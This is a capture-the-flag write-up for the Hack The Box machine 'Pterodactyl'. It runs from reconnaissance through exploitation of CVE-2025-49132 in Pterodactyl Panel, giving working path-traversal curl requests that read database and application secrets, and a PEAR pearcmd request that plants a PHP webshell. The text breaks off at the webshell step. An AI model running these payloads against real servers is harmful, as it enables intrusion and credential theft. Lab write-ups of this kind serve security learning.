Hack The Box - Season 10 HTB Pterodactyl Writeup - Meduim - Weekly - Feb 07th, 2026
HackTheBox: Pterodactyl - Writeup
Difficulty: Medium OS: Linux (openSUSE Leap 15.6) Release: Season 10
Table of Contents
- Reconnaissance
- Web Enumeration
- Exploitation - CVE-2025-49132
- Remote Code Execution via PEAR
- Database Enumeration
- SSH Access
- Privilege Escalation
- Root Access
- Lessons Learned
Reconnaissance
Initial Port Scan
Starting with a comprehensive port scan to identify running services:
nmap -sC -sV -oN nmap/initial [TARGET_IP]
Results:
| Port | Service | Version |
|---|---|---|
| 22 | SSH | OpenSSH 9.6 |
| 80 | HTTP | nginx 1.21.5 |
The scan reveals a Linux host running SSH and an nginx web server. The HTTP title shows "My Minecraft Server", hinting at game server management software.
Service Fingerprinting
whatweb http://[TARGET_IP]
The response indicates a redirect and reveals PHP/Laravel headers, suggesting a Laravel-based application.
Web Enumeration
Virtual Host Discovery
Accessing the IP directly shows a default page. Checking for virtual hosts by examining the redirect:
curl -I http://[TARGET_IP]
The server redirects to pterodactyl.htb. Adding this to /etc/hosts:
echo "[TARGET_IP] pterodactyl.htb" | sudo tee -a /etc/hosts
Further enumeration reveals additional subdomains:
panel.pterodactyl.htb- The Pterodactyl Panel admin interfaceplay.pterodactyl.htb- Game server access
echo "[TARGET_IP] panel.pterodactyl.htb play.pterodactyl.htb" | sudo tee -a /etc/hosts
Panel Reconnaissance
Accessing panel.pterodactyl.htb presents the Pterodactyl Panel login page. Key observations:
- Framework: Laravel (PHP)
- Cookies:
XSRF-TOKEN,pterodactyl_sessionconfirm Laravel - Version: Visible in page source/JavaScript files
Checking for publicly accessible files:
curl http://panel.pterodactyl.htb/robots.txt
curl http://panel.pterodactyl.htb/.env
The .env file returns 403, but this confirms its existence.
Exploitation - CVE-2025-49132
Vulnerability Overview
CVE-2025-49132 is a critical path traversal vulnerability (CVSS 10.0) affecting Pterodactyl Panel versions prior to 1.11.11. The vulnerability exists in the /locales/locale.json endpoint, which fails to properly sanitize the locale and namespace parameters.
Testing the Vulnerability
# Attempt to read database configuration
curl -s "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../pterodactyl&namespace=config/database" | jq .
Success! The response contains the full database configuration:
{
"default": "mysql",
"connections": {
"mysql": {
"driver": "mysql",
"host": "127.0.0.1",
"port": "3306",
"database": "panel",
"username": "pterodactyl",
"password": "[REDACTED_DB_PASSWORD]"
}
}
}
Extracting Additional Configuration
# Application configuration (includes APP_KEY)
curl -s "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../pterodactyl&namespace=config/app" | jq .
# Mail configuration
curl -s "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../pterodactyl&namespace=config/mail" | jq .
Extracted Credentials:
- Database:
pterodactyl:[REDACTED] - APP_KEY:
base64:[REDACTED]
Remote Code Execution via PEAR
The PEAR Chain
While the path traversal allows reading configuration files, we can chain it with PHP's PEAR (PHP Extension and Application Repository) to achieve RCE. This technique works when:
register_argc_argvis enabled in PHP configuration- PEAR is installed (common on many systems)
Exploitation Steps
The attack leverages PEAR's config-create command to write arbitrary content to files:
# Write a webshell using PEAR config-create
curl -g -s 'http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/<?=system($_GET[0]);?>+/var/www/pterodactyl/public/cmd.php'